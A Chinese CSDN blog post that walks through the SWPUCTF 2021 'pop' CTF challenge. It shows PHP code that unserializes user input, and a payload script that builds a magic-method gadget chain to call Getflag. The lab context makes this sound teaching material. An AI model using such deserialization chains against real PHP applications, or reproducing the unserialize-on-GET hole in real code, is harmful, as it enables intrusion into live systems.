[SWPUCTF 2021 新生赛]pop(NSSCTF)

最新推荐文章于 2024-03-27 16:45:38 发布
最新推荐文章于 2024-03-27 16:45:38 发布
阅读量294 收藏 1
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129326061
版权

1.打开环境,审计代码。是pop链问题。

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

phppop链的原理是构造不同类相互调用的链条,调用php的魔术方法来实现flag的读取

常见的魔术方法

_invoke#当被函数调用时自动执行
_construct
_destruct
_wakeup#反序列化时自动调用
_tostring#被当作字符串处理时自动调用
_sleep#序列化时自动调用

payload:

<?php

class w44m{

    private $admin = 'w44m';
    protected $passwd = '08067';

}

class w22m{
    public $w00m;
}

class w33m{
    public $w00m;
    public $w22m;

}
# w22m.__destruct().w00m->w33m.__toString().w00m->w44m.Getflag()
$a = new w22m();
$b = new w33m();
$c = new w44m();
# 入口
$a->w00m=$b;
# 链子
$b->w00m=$c;
$b->w22m='Getflag';
echo urlencode(serialize($a));#用url编码是因为protected类的变量有不可见字符
?>

ha0cker
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1470
。。
辞郁POP打印工具(2021-06-18)
11-08
辞郁POP工具主要用于:打印零售软件中商品POP促销单。 本程序使用于:思迅软件、科脉软件、百威软件、泰格软件、嬴通软件等。 安装配置完连接参数后,用默认管理员账号:辞郁,密码:ciyu登录,主界面左上角,双击...
[SWPUCTF 2021 新生]pop
kuzemax的博客
04-30 124
php?
Pop-up Photo Wall 1.6
08-09
Pop-up Photo Wall 1.6
Uni_pop.rar_pop
09-20
标题中的"Uni_pop.rar_pop"可能是指一个名为"Uni_pop"的程序或工具,它与电子邮件的POP(Post Office Protocol)协议有关。POP是互联网上用于接收电子邮件的标准协议,允许用户从邮件服务器下载邮件到本地设备。这个...
SMTP.POP.rar_pop
09-14
在这个"SMTP.POP.rar_pop"压缩包中,包含了一个名为"SMTP.POP.ppt"的文件,我们可以推测这是一个关于SMTP和POP协议的PowerPoint演示文稿,它可能详细讲解了这两个协议的工作原理、使用方法以及在DOS环境下如何通过...
pop.rar_pop
09-22
"pop.rar_pop"这个文件名可能是指一个压缩包,其中包含了与Java相关的代码或资源,特别是与图像处理和用户界面设计有关的部分。描述中的“image resize in java can be used in applet or window”暗示了压缩包内的...
NSS [SWPUCTF 2021 新生]pop
Jay17的博客
07-27 318
NSS [SWPUCTF 2021 新生]pop
[SWPUCTF 2021 新生]pop-----WP
pythllc的博客
10-23 352
源码展示。
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 2574
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
php反序列化——pop链构造[SWPUCTF 2021 新生]pop [NISACTF 2022]babyserialize
最新发布
m0_73756016的博客
03-27 834
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的链条是(反推)
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 3408
SWPUCTF 2021 新生(日常练习)
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1071
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值